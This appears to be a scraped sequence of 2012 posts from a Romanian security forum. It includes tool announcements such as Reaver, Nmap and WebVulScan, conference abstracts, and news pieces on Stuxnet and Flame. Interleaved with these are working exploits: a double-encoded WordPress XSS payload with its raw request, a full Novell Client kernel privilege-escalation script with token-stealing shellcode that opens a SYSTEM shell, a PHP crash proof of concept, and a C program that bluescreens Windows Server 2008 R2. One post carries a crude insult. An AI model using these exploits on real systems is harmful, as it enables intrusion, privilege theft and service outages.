Nytro

Reaver v1.4 - WPS Brute force attack against Wifi The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours. Screenshot: http://2.bp.blogspot.com/-x1sTEFZqpvU/T85ITbIGQ3I/AAAAAAAAGfE/Dqh7dgJUGvY/s1600/Reaver+v1.4+-+WPS+Brute+force+attack+against+Wifi.jpg Usage is simple; just specify the target BSSID and the monitor mode interface to use: # reaver -i mon0 -b 00:01:02:03:04:05 For those interested, there is also a commercial version available with more features and speed improvements. On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. Download Reaver v1.4 Sursa: SSLsplit - Transparent and Scalable SSL/TLS Interceptor | Security, Hacking and Penetration Testing Tools

Windows 7, powerful malware, "open-source", Fully UnDetectable: PowerShell

WordPress 3.3.2 Cross Site Scripting Authored by old man WordPress version 3.3.2 suffers from double-encoding cross site scripting vulnerability that bypasses the filter for protection. There is a persistent XSS vulnerability in the wordpress version 3.3.2. However, the severity of this finding is very LOW. The detail is as follow, a) Login into an admin account Navigate to Links -> Links Categories c) Fill up the required details and intercept the request with a BURP suite. d) The injectable parameter is slug. If you inject <script>alert(1)</script> as a value to parameter "slug", the application strips it off and the value becomes alert1. But if the payload is double encode then ;-) <script>alert(1)</script> when converted to %253cscript%253ealert%25281%2529%253c%252fscript%253e bypasses xss protection. The following request shows the raw burp request along with the vulnerable parameter and payload marked in bold. BURP REQUEST POST /wordpress/wp-admin/edit-tags.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux i686; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://localhost/wordpress/wp-admin/edit-tags.php?action=edit&taxonomy=link_category&tag_ID=2&post_type=post Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C197b22093eaefaf6950bd81d6aa6372b; wp-settings-time-1=1335371272; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1335544051%7C6ebcb9d0104a37c6d7a91274ac94c6cb Content-Type: application/x-www-form-urlencoded Content-Length: 379 action=editedtag&tag_ID=2&taxonomy=link_category&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Ftaxonomy%3Dlink_category&_wpnonce=83974d7f8f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fedit-tags.php%3Faction%3Dedit%26taxonomy%3Dlink_category%26tag_ID%3D2%26post_type%3Dpost&name=Blogroll&slug=injecthere%253cscript%253ealert%25281%2529%253c%252fscript%253e&description=sectest&submit=Update Sursa: WordPress 3.3.2 Cross Site Scripting ? Packet Storm

De ce am impresia ca era o porcarie?

Da, poate, astfel de oameni idolatrizez.

[h=1]nullcon Goa 2012: HaxdroiD Empowering Handsets - By Anant & Pardhu[/h] As already proven by the recent trends the next wave will be the mobile computing wave and so will be the shift of platform for penetration testing. Although android is targeted as next generation computing platform it still lacks the capability to perform VA / PT / ethical hacking on it. If we look at the android market we find it lacking in lots of terms, not much of a tool set available and not much of documentation availability online too. This paper will discuss various options that are available for converting an innocent android handset to a penetration testing platform. This talk will evaluate the current scenario and also present with various options that are available for people. Not just about existing tool set, we will also be exploring ways and means to explore and exploit the android platform to the limits. We will also be publishing a customized android ROM which is a direct attack platform. It will have advance feature set pre-configured and ready to use saving large efforts of security researchers. (This ROM will be published to two different handset models however will have options to be ported to just about any handset/tablet which can handle the load. Sursa: nullOxOO - YouTube

[h=1]nullcon Goa 2012: Attacking Backup Software - By Nibin Varghese[/h] Backup software is a valuable asset for any organization. These softwares runs on a large number of systems in an enterprise. The main functionality for these softwares is to provide back up and recovery options for the critical data that belongs to the enterprise. The hosts requiring these back up services communicates with a back up server over the network. The different modes of operations between the server and client would be a pull model where the server connects to the client or a push model where the client connects to the server. If the communication between the server and client is not validated properly, there can be different vectors of attack that can be conducted on these softwares. This paper would explain an attack on Symantec Back-up softwares (CVE-2011-0546, BID:47824) where it was possible to do a man in the middle attack to steal information from host machines. The bug was very critical and complex as it affected a major architectural flaw of the application on how it validated the host machines before a back up operation was initiated. Sursa: nullOxOO - YouTube

[h=1]nullcon Goa 2012: IVR Security Internal Network Attacks via Phone - By Rahul Sasi[/h] The following research is on IVR (Interactive Voice Response) systems which are currently used in Phone Banking, Call centers, Hospitals and corporate mainly for information retrieval and Remote Management via Telephone lines. The paper explains a serious of security issues concerning these systems (IVR) and exploitation techniques and ways of carrying out attacks on internal network via Telephone lines. A demonstration of few exploits on IVR systems and a real incident about a critical responsibly disclosed banking flow in its Phone Banking System would be done. Sursa: nullOxOO - YouTube

[h=1]nullcon Goa 2012: Binary God - By Atul Alex[/h] Talk is about Abstract Processor named Aod8 designed by Atul. The idea is to emulate at programming level an abstract design. The objective of this research was to understand the basics of designing a processor architecture, creating a custom Assembler for this Architecture to write programs for it, writing your own debugger & creating a highly basic Operating System for it. speaker will be demonstrating the tools that he has created for the same, explain how he wrote the Operating System.. the idea behind writing the debugger & the Assembler.Concepts of handling the memory & bypassing size-limitations of the architecture. Sursa: nullOxOO - YouTube

[h=1]nullcon Goa 2012: Attacking and Defending the Smart Grid - By Justin Searle[/h] The Smart Grid brings greater benefits for electric utilities and customer alike, however these benefits come at a cost from a security perspective. Unlike the over-hyped messages we usually hear from the media, the sky is NOT falling. However, just like any other technology, the systems and devices that make up the Smart Grid will have weaknesses and vulnerabilities. It is important for us to understand these vulnerabilities, how they can be attacked, and what we need to do to defend against those attacks. This presentation will explore the architecture of most Smart Meters, explain the methodologies developed to perform penetration testing on them, enumerate the types of vulnerabilities we commonly find, and discuss the solutions/recommendation. Sursa: nullOxOO - YouTube

Interesant: http://www.nytimes.com/interactive/2012/06/01/world/middleeast/how-a-secret-cyberwar-program-worked.html?src=tp

[h=1]Obama Order Sped Up Wave of Cyberattacks Against Iran[/h][h=6]By DAVID E. SANGER[/h] [h=6]Published: June 1, 2012[/h] WASHINGTON — From his first months in office, President Obama secretly ordered increasingly sophisticated attacks on the computer systems that run Iran’s main nuclear enrichment facilities, significantly expanding America’s first sustained use of cyberweapons, according to participants in the program. Mr. Obama decided to accelerate the attacks — begun in the Bush administration and code-named Olympic Games — even after an element of the program accidentally became public in the summer of 2010 because of a programming error that allowed it to escape Iran’s Natanz plant and sent it around the world on the Internet. Computer security experts who began studying the worm, which had been developed by the United States and Israel, gave it a name: Stuxnet. At a tense meeting in the White House Situation Room within days of the worm’s “escape,” Mr. Obama, Vice President Joseph R. Biden Jr. and the director of the Central Intelligence Agency at the time, Leon E. Panetta, considered whether America’s most ambitious attempt to slow the progress of Iran’s nuclear efforts had been fatally compromised. “Should we shut this thing down?” Mr. Obama asked, according to members of the president’s national security team who were in the room. Told it was unclear how much the Iranians knew about the code, and offered evidence that it was still causing havoc, Mr. Obama decided that the cyberattacks should proceed. In the following weeks, the Natanz plant was hit by a newer version of the computer worm, and then another after that. The last of that series of attacks, a few weeks after Stuxnet was detected around the world, temporarily took out nearly 1,000 of the 5,000 centrifuges Iran had spinning at the time to purify uranium. This account of the American and Israeli effort to undermine the Iranian nuclear program is based on interviews over the past 18 months with current and former American, European and Israeli officials involved in the program, as well as a range of outside experts. None would allow their names to be used because the effort remains highly classified, and parts of it continue to this day. These officials gave differing assessments of how successful the sabotage program was in slowing Iran’s progress toward developing the ability to build nuclear weapons. Internal Obama administration estimates say the effort was set back by 18 months to two years, but some experts inside and outside the government are more skeptical, noting that Iran’s enrichment levels have steadily recovered, giving the country enough fuel today for five or more weapons, with additional enrichment. Whether Iran is still trying to design and build a weapon is in dispute. The most recent United States intelligence estimate concludes that Iran suspended major parts of its weaponization effort after 2003, though there is evidence that some remnants of it continue. Iran initially denied that its enrichment facilities had been hit by Stuxnet, then said it had found the worm and contained it. Last year, the nation announced that it had begun its own military cyberunit, and Brig. Gen. Gholamreza Jalali, the head of Iran’s Passive Defense Organization, said that the Iranian military was prepared “to fight our enemies” in “cyberspace and Internet warfare.” But there has been scant evidence that it has begun to strike back. The United States government only recently acknowledged developing cyberweapons, and it has never admitted using them. There have been reports of one-time attacks against personal computers used by members of Al Qaeda, and of contemplated attacks against the computers that run air defense systems, including during the NATO-led air attack on Libya last year. But Olympic Games was of an entirely different type and sophistication. It appears to be the first time the United States has repeatedly used cyberweapons to cripple another country’s infrastructure, achieving, with computer code, what until then could be accomplished only by bombing a country or sending in agents to plant explosives. The code itself is 50 times as big as the typical computer worm, Carey Nachenberg, a vice president of Symantec, one of the many groups that have dissected the code, said at a symposium at Stanford University in April. Those forensic investigations into the inner workings of the code, while picking apart how it worked, came to no conclusions about who was responsible. A similar process is now under way to figure out the origins of another cyberweapon called Flame that was recently discovered to have attacked the computers of Iranian officials, sweeping up information from those machines. But the computer code appears to be at least five years old, and American officials say that it was not part of Olympic Games. They have declined to say whether the United States was responsible for the Flame attack. Mr. Obama, according to participants in the many Situation Room meetings on Olympic Games, was acutely aware that with every attack he was pushing the United States into new territory, much as his predecessors had with the first use of atomic weapons in the 1940s, of intercontinental missiles in the 1950s and of drones in the past decade. He repeatedly expressed concerns that any American acknowledgment that it was using cyberweapons — even under the most careful and limited circumstances — could enable other countries, terrorists or hackers to justify their own attacks. “We discussed the irony, more than once,” one of his aides said. Another said that the administration was resistant to developing a “grand theory for a weapon whose possibilities they were still discovering.” Yet Mr. Obama concluded that when it came to stopping Iran, the United States had no other choice. If Olympic Games failed, he told aides, there would be no time for sanctions and diplomacy with Iran to work. Israel could carry out a conventional military attack, prompting a conflict that could spread throughout the region. A Bush Initiative The impetus for Olympic Games dates from 2006, when President George W. Bush saw few good options in dealing with Iran. At the time, America’s European allies were divided about the cost that imposing sanctions on Iran would have on their own economies. Having falsely accused Saddam Hussein of reconstituting his nuclear program in Iraq, Mr. Bush had little credibility in publicly discussing another nation’s nuclear ambitions. The Iranians seemed to sense his vulnerability, and, frustrated by negotiations, they resumed enriching uranium at an underground site at Natanz, one whose existence had been exposed just three years before. Iran’s president, Mahmoud Ahmadinejad, took reporters on a tour of the plant and described grand ambitions to install upward of 50,000 centrifuges. For a country with only one nuclear power reactor — whose fuel comes from Russia — to say that it needed fuel for its civilian nuclear program seemed dubious to Bush administration officials. They feared that the fuel could be used in another way besides providing power: to create a stockpile that could later be enriched to bomb-grade material if the Iranians made a political decision to do so. Hawks in the Bush administration like Vice President Dick Cheney urged Mr. Bush to consider a military strike against the Iranian nuclear facilities before they could produce fuel suitable for a weapon. Several times, the administration reviewed military options and concluded that they would only further inflame a region already at war, and would have uncertain results. For years the C.I.A. had introduced faulty parts and designs into Iran’s systems — even tinkering with imported power supplies so that they would blow up — but the sabotage had had relatively little effect. General James E. Cartwright, who had established a small cyberoperation inside the United States Strategic Command, which is responsible for many of America’s nuclear forces, joined intelligence officials in presenting a radical new idea to Mr. Bush and his national security team. It involved a far more sophisticated cyberweapon than the United States had designed before. The goal was to gain access to the Natanz plant’s industrial computer controls. That required leaping the electronic moat that cut the Natanz plant off from the Internet — called the air gap, because it physically separates the facility from the outside world. The computer code would invade the specialized computers that command the centrifuges. The first stage in the effort was to develop a bit of computer code called a beacon that could be inserted into the computers, which were made by the German company Siemens and an Iranian manufacturer, to map their operations. The idea was to draw the equivalent of an electrical blueprint of the Natanz plant, to understand how the computers control the giant silvery centrifuges that spin at tremendous speeds. The connections were complex, and unless every circuit was understood, efforts to seize control of the centrifuges could fail. ........................ Articol complet: http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1

[h=1]Why Antivirus Companies Like Mine Failed to Catch Flame and Stuxnet[/h] By Mikko Hypponen Email Author June 1, 2012 A couple of days ago, I received an e-mail from Iran. It was sent by an analyst from the Iranian Computer Emergency Response Team, and it was informing me about a piece of malware their team had found infecting a variety of Iranian computers. This turned out to be Flame: the malware that has now been front-page news worldwide. When we went digging through our archive for related samples of malware, we were surprised to find that we already had samples of Flame, dating back to 2010 and 2011, that we were unaware we possessed. They had come through automated reporting mechanisms, but had never been flagged by the system as something we should examine closely. Researchers at other antivirus firms have found evidence that they received samples of the malware even earlier than this, indicating that the malware was older than 2010. What this means is that all of us had missed detecting this malware for two years, or more. That’s a spectacular failure for our company, and for the antivirus industry in general. It wasn’t the first time this has happened, either. Stuxnet went undetected for more than a year after it was unleashed in the wild, and was only discovered after an antivirus firm in Belarus was called in to look at machines in Iran that were having problems. When researchers dug back through their archives for anything similar to Stuxnet, they found that a zero-day exploit that was used in Stuxnet had been used before with another piece of malware, but had never been noticed at the time. A related malware called DuQu also went undetected by antivirus firms for over a year. Stuxnet, Duqu and Flame are not normal, everyday malware, of course. All three of them were most likely developed by a Western intelligence agency as part of covert operations that weren’t meant to be discovered. The fact that the malware evaded detection proves how well the attackers did their job. In the case of Stuxnet and DuQu, they used digitally signed components to make their malware appear to be trustworthy applications. And instead of trying to protect their code with custom packers and obfuscation engines — which might have drawn suspicion to them — they hid in plain sight. In the case of Flame, the attackers used SQLite, SSH, SSL and LUA libraries that made the code look more like a business database system than a piece of malware. Someone might argue that it’s good we failed to find these pieces of code. Most of the infections occurred in politically turbulent areas of the world, in countries like Iran, Syria and Sudan. It’s not known exactly what Flame was used for, but it’s possible that if we had detected and blocked it earlier, we might have indirectly helped oppressive regimes in these countries thwart the efforts of foreign intelligence agencies to monitor them. But that’s not the point. We want to detect malware, regardless of its source or purpose. Politics don’t even enter the discussion, nor should they. Any malware, even targeted, can get out of hand and cause “collateral damage” to machines that aren’t the intended victim. Stuxnet, for example, spread around the world via its USB worm functionality and infected more than 100,000 computers while seeking out its real target, computers operating the Natanz uranium enrichment facility in Iran. In short, it’s our job as an industry to protect computers against malware. That’s it. Yet we failed to do that with Stuxnet and DuQu and Flame. This makes our customers nervous. The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose. And the zero-day exploits used in these attacks are unknown to antivirus companies by definition. As far as we can tell, before releasing their malicious codes to attack victims, the attackers tested them against all of the relevant antivirus products on the market to make sure that the malware wouldn’t be detected. They have unlimited time to perfect their attacks. It’s not a fair war between the attackers and the defenders when the attackers have access to our weapons. Antivirus systems need to strike a balance between detecting all possible attacks without causing any false alarms. And while we try to improve on this all the time, there will never be a solution that is 100 percent perfect. The best available protection against serious targeted attacks requires a layered defense, with network intrusion detection systems, whitelisting against known malware and active monitoring of inbound and outbound traffic of an organization’s network. This story does not end with Flame. It’s highly likely there are other similar attacks already underway that we haven’t detected yet. Put simply, attacks like these work. Flame was a failure for the antivirus industry. We really should have been able to do better. But we didn’t. We were out of our league, in our own game. Sursa: Why Antivirus Companies Like Mine Failed to Catch Flame and Stuxnet | Threat Level | Wired.com

Nu foarte detaliate, dar ca prezentare sunt ok.

Pentru subiectele de tip "Cancan" folositi categoria "Cosul de gunoi". Multumesc.

Ai un post e blog: Shell | TuR334VL Blog Cica: "@author TuR334VL" Si am gasit asta: ?><?php /** * @author Ikram ALI * @copyright 2012 */ @de - Pastebin.com Care cam seamana cu ce zici tu ca ai facut. Concluzia: ban. Oamenii ca tine, care nu stiu sa ofere credite pentru munca altora, care se lauda cu munca altora, o fura, nu au ce cauta aici.

Nmap Port Scanner 6.00 Authored by Fyodor | Site insecure.org Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth. In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning. Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings. Changes: NSE has been enhanced, there is better web scanning, full IPv6 support added, a new nping tool, better zenmap gui, and faster scans. First major release since 2009. Download: http://packetstormsecurity.org/files/download/112951/nmap-6.00.tgz Sursa: Nmap Port Scanner 6.00 ? Packet Storm

Link: http://packetlife.net/library/cheat-sheets/

[h=1]Novell Client 4.91 SP4 Privilege Escalation Exploit[/h]Author: sickness # Novell Client 4.91 SP3/4 Privilege escalation exploit # Download link: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~ # # SecurityFocus: http://www.securityfocus.com/bid/27209/info # CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5762 # Patch: http://download.novell.com/Download?buildid=4FmI89wOmg4~ # # Author: sickness@offensive-security.com # Version Tested: Novell Client 4.91 SP4 # Targets: Exploit works on all service packs of Win2K3 and WinXP (except Windows XP SP1) # Thanks: # - g0tmi1k for helping me test out the exploit on as many versions of Windows as possible. # - ryujin for the help while developing the exploit. from ctypes import * import sys,struct,os from optparse import OptionParser kernel32 = windll.kernel32 ntdll = windll.ntdll Psapi = windll.Psapi def GetBase(drvname=None): EVIL_ARRAY = 1024 myarray = c_ulong * EVIL_ARRAY lpImageBase = myarray() cb = c_int(1024) lpcbNeeded = c_long() drivername_size = c_long() drivername_size.value = 48 Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) for baseaddr in lpImageBase: drivername = c_char_p("\x00"*drivername_size.value) if baseaddr: Psapi.GetDeviceDriverBaseNameA(baseaddr, drivername, drivername_size.value) if drvname: if drivername.value.lower() == drvname: print "[>] Retrieving %s information." % drvname print "[>] %s base address: %s" % (drvname, hex(baseaddr)) return baseaddr else: if drivername.value.lower().find("krnl") !=-1: print "[>] Retrieving Kernel information." print "[>] Kernel version: ", drivername.value print "[>] Kernel base address: %s" % hex(baseaddr) return (baseaddr, drivername.value) return None if __name__ == '__main__': usage = "%prog -o <target>" parser = OptionParser(usage=usage) parser.add_option("-o", type="string", action="store", dest="target_os", help="Available target operating systems: XP, 2K3") (options, args) = parser.parse_args() OS = options.target_os if not OS or OS.upper() not in ['XP','2K3']: parser.print_help() sys.exit() OS = OS.upper() GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE = '\\\\.\\nicm' device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) (krnlbase, kernelver) = GetBase() hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += krnlbase HalBase = GetBase("hal.dll") print "[>] HalDispatchTable address:", hex(HalDispatchTable) HalDispatchTable0x4 = HalDispatchTable + 0x4 HalDispatchTable0x8 = HalDispatchTable0x4 + 0x4 HalDispatchTable_0x14 = HalDispatchTable0x4 - 0x10 if OS == "2K3": HaliQuerySystemInformation = HalBase + 0x1fa1e # Offset for 2003 HalpSetSystemInformation = HalBase + 0x21c60 # Offset for 2003 else: HaliQuerySystemInformation = HalBase + 0x16bba # Offset for XP HalpSetSystemInformation = HalBase + 0x19436# Offset for XP print "[>] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation) print "[>] HalpSetSystemInformation address:", hex(HalpSetSystemInformation) EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL retn = c_ulong() inut_buffer = HalDispatchTable0x4 - 0x10 + 0x3 # Make the pwnsauce overwrite inut_size = 0x0 output_buffer = 0x41414141 # Junk output_size = 0x0 # Get offsets if OS == "2K3": _KPROCESS = "\x38" # Offset for 2003 _TOKEN = "\xd8" # Offset for 2003 _UPID = "\x94" # Offset for 2003 _APLINKS = "\x98" # Offset for 2003 else: _KPROCESS = "\x44" # Offset for XP _TOKEN = "\xc8" # Offset for XP _UPID = "\x84" # Offset for XP _APLINKS = "\x88" # Offset for XP # Restore the pointer pointer_restore = "\x31\xc0" + \ "\xb8" + struct.pack("L", HalpSetSystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x8) + \ "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x4) # Make the evil token stealing steal_token = "\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x89\x1d\x00\x09\x02\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5b" +\ "\x5a" +\ "\xc2\x10" # Build the shellcode sc = "\x90" * 100 sc+= pointer_restore + steal_token sc+= "\x90" * 100 if OS == "2K3": baseadd = c_int(0x02a6ba10) else: baseadd = c_int(0x026e7bb0) MEMRES = (0x1000 | 0x2000) PAGEEXE = 0x00000040 Zero_Bits = c_int(0) RegionSize = c_int(0x1000) write = c_int(0) dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE) if OS == "2K3": kernel32.WriteProcessMemory(-1, 0x02a6ba10, sc, 0x1000, byref(write)) else: kernel32.WriteProcessMemory(-1, 0x026e7bb0, sc, 0x1000, byref(write)) if device_handler: print "[>] Sending IOCTL to the driver." dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None) evil_in = c_ulong() evil_out = c_ulong() evil_in = 0x1337 hola = ntdll.NtQueryIntervalProfile(evil_in, byref(evil_out)) print "[>] Launching shell as SYSTEM." os.system("cmd.exe /K cd c:\\windows\\system32") Sursa: Novell Client 4.91 SP4 Privilege Escalation Exploit

[h=1]PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce[/h] <?php /* PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce Author : condis Date : 10.04.2012 AD Website : http://cond.psychodela.pl ---- Download : http://php.net/downloads.php Tested on: PHP 5.3.8 + Windows XP SP3 Professional PL PHP 5.3.10 + Windows XP SP3 Professional PL PHP 5.4.0 + Windows XP SP3 Professional PL PHP 5.4.3 + Windows XP SP3 Professional PL Description: wddx_serialize_value and wddx_serialize_vars functions fails to handle Variant object when it is given as a first argument. Registers: EAX 00000000 ECX 1056AAE8 php5ts.1056AAE8 EDX 100EFCE0 php5ts.100EFCE0 EBX 01032AB0 ESP 00C0FAE0 EBP 00000000 ESI 0121E478 EDI 0121CB50 EIP 1028F22E php5ts.1028F22E Crash: 1028F22E 8A45 25 MOV AL,BYTE PTR SS:[EBP+25] Situation looks pretty much the same for both wddx_serialize_vars and wddx_serialize_value. Also functions stream_bucket_prepend and stream_bucket_append have some problems with handling Variant object when given as a second argument: stream_bucket_append(1, new Variant(1)); stream_bucket_prepend(1, new Variant(1)); PS : Variant object is only available in PHP for Windows OS and it was implemented in PHP > 4.1.0 and PHP 5. For more details check : http://php.net/manual/en/class.variant.php PS2: After running this via webserver my Apache wasn't able to handle requests anymore and I had to restart him kthxbye */ wddx_serialize_value(new Variant(666)); ?> Sursa: PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce

Se vrea a trimite request-uri HTTP cu JavaScript (jsHTTP). Vezi sursa.

Sa isi porteze si Mozilla/Google browserele pe ARM si nu cred ca o sa fie probleme. Daca eram Microsoft ma pisam pe Mozilla si pe Google, nu bagam niciun "Browser choice", sa isi faca si Mozilla un sistem de operare, iar Google sa bage "Browser choice" pe Android, poate vreau sa folosesc Internet Explorer pe Android, e problema mea. Deci muie pretentiilor cu care vin Mozilla si Google.

Nu mai bine luati voi ban pe forum, in loc sa ajungeti la puscarie pentru niste rahaturi?

[h=3]WebVulScan - web application vulnerability scanner[/h][h=2]May 13, 2012[/h] WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found. After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited. The vulnerabilities tested by WebVulScan are: Reflected Cross-Site Scripting Stored Cross-Site Scripting Standard SQL Injection Broken Authentication using SQL Injection Autocomplete Enabled on Password Fields Potentially Insecure Direct Object References Directory Listing Enabled HTTP Banner Disclosure SSL Certificate not Trusted Unvalidated Redirects Features: Crawler: Crawls a website to identify and display all URLs belonging to the website. Scanner: Crawls a website and scans all URLs found for vulnerabilities. Scan History: Allows a user to view or download PDF reports of previous scans that they performed. Register: Allows a user to register with the web application. Login: Allows a user to login to the web application. Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default). PDF Generation: Dynamically generates a detailed PDF report. Report Delivery: The PDF report is emailed to the user as an attachment. This software was developed, and should only be used, entirely for ethical purposes. Running security testing tools such as this on a website (web application) could damage it. In order to stay ethical, you must ensure you have permission of the owners before testing a website (web application). Testing the security of a website (web application) without authorisation is unethical and against the law in many countries. Download: https://code.google.com/p/webvulscan/downloads/list Source: https://code.google.com/p/webvulscan/ Via: Defcamp

MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege Microsoft update release Microsoft Security Bulletin MS12-032 - Important : Vulnerability in TCP/IP Could Allow Elevation of Privilege (2688338) Possible MS12-032 Proof of concept from StackOverflow thx to @avivra We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines. // the program attempts to bind to IPV6-mapped IPV4 address // in a tight loop. If the address is not configured on the machine // running the program crashes Windows Server 2008 R2 (if program is 32-bit) #include #include #include #include #define IPV6_V6ONLY 27 void MyWsaStartup() { WORD wVersionRequested; WSADATA wsaData; int err; wVersionRequested = MAKEWORD(2, 2); err = WSAStartup(wVersionRequested, &wsaData); if (err != 0) { printf("WSAStartup failed with error: %d\n", err); exit(-1); } } void main() { MyWsaStartup(); bool bindSuccess = false; while(!bindSuccess) { SOCKET sock = WSASocket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED); if(sock == INVALID_SOCKET) { printf("WSASocket failed\n"); exit(-1); } DWORD val = 0; if (setsockopt(sock, IPPROTO_IPV6, IPV6_V6ONLY, (const char*)&val, sizeof(val)) != 0) { printf("setsockopt failed\n"); closesocket(sock); exit(-1); } sockaddr_in6 sockAddr; memset(&sockAddr, 0, sizeof(sockAddr)); sockAddr.sin6_family = AF_INET6; sockAddr.sin6_port = htons(5060); // set address to IPV6-mapped 169.13.13.13 (not configured on the local machine) // that is [::FFFF:169.13.13.13] sockAddr.sin6_addr.u.Byte[15] = 13; sockAddr.sin6_addr.u.Byte[14] = 13; sockAddr.sin6_addr.u.Byte[13] = 13; sockAddr.sin6_addr.u.Byte[12] = 169; sockAddr.sin6_addr.u.Byte[11] = 0xFF; sockAddr.sin6_addr.u.Byte[10] = 0xFF; int size = 28; // 28 is sizeof(sockaddr_in6) int nRet = bind(sock, (sockaddr*)&sockAddr, size); if(nRet == SOCKET_ERROR) { closesocket(sock); Sleep(100); } else { bindSuccess = true; printf("bind succeeded\n"); closesocket(sock); } } }by d3v1l at 22:37 Sursa: Security-Shell: MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege